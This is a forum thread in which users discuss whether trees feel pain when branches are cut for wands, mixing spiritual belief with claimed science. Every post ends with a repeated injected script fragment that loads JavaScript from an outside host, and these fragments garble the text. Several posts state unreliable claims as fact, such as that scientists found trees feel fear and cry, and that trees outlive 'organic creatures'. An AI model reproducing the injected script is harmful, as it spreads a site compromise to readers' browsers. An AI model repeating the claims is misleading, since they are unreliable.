I was just wondering...do trees and plants feel pain as we do? Like when we cut a branch from a tree to make wands...do the tree feel pain? Okay I know this is a dumb question for some of you...but I wanna know your opinions. =) sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
Some believe tree spirits live in trees-and yes they feel pain. Me personally Yes.
When the big hurricane passed through Houston a friend heard the trees screaming as they were pulled by the winds. But I have never heard them myself.
But remember they have no central nervous system so the plants would feel things totally differntly than us. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
I believe that they do feelpain...emotional and physical...
That is why i offer them my blood when i have been given permission to cut a branch
just a little prick in the finger and a few drops of blood will do sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
Scientists have found that trees do have a way of feeling pain, so yes for both spiritually and scientifically they do feel pain. Some even feel fear and others can also cry. It may be that not all plants do, but certain trees do so I don't see why other plants shouldn't be able to. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
A tree is one of the most spiritual creatures on Earth. They are the oldest living creatures and have weathered many different types of climates and destruction. That is why it is used as a depiction of life. I believe they do not feel pain like you or I do for they do not have such sensitive nerves. The most pain to a plant is through poison and lack of water. Wind can harm the tree but the breaking and cutting of a tree is not that physically painful. A tree is suppose to shed some of it's branches over time it is how it grows. The spiritual pain a tree feels is however very close to our own. They cry just as we do but without the tears. Trees have different personalities just like all other creatures. Just remember to be nice to them and if you take the time to plant trees all trees will see that ingrained on your soul. For those who plant trees love others besides themselves. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
Trees are not the oldest, simply because without water or soil, they would cease to exist.
Fish came before trees, aswell as coral and underwater plants. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
I do not mean the oldest creature to have lived on earth. I mean that they are the oldest creature to still be living. This on is almost 10,000 years old.
That makes more sense. I thought you meant oldest as in first here. :) Yeah, trees tend to have longer life-spans then organic creatures do. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
